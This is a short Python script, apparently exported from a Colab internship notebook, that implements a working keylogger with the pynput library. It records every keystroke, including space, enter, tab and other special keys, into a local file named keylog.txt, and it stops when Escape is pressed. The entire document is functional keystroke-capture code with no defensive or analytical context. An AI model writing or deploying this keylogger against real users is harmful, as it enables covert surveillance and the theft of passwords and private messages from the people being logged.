# -*- coding: utf-8 -*-
"""Intership.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1ot0KpvOR4Lh6XhY-zWMKtVfrBnsej4Yz
"""

from pynput import keyboard

log_file = "keylog.txt"

def on_press(key):
    try:
        with open(log_file, "a") as f:
            f.write(str(key.char))
    except AttributeError:
        with open(log_file, "a") as f:
            # For special keys like space, enter, etc.
            if key == keyboard.Key.space:
                f.write(" ")
            elif key == keyboard.Key.enter:
                f.write("\n")
            elif key == keyboard.Key.tab:
                f.write("\t")
            else:
                f.write(f" [{key}] ")

def on_release(key):
    # Stop the keylogger if escape key is pressed
    if key == keyboard.Key.esc:
        return False

def main():
    with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
        listener.join()

if __name__ == "__main__":
    main()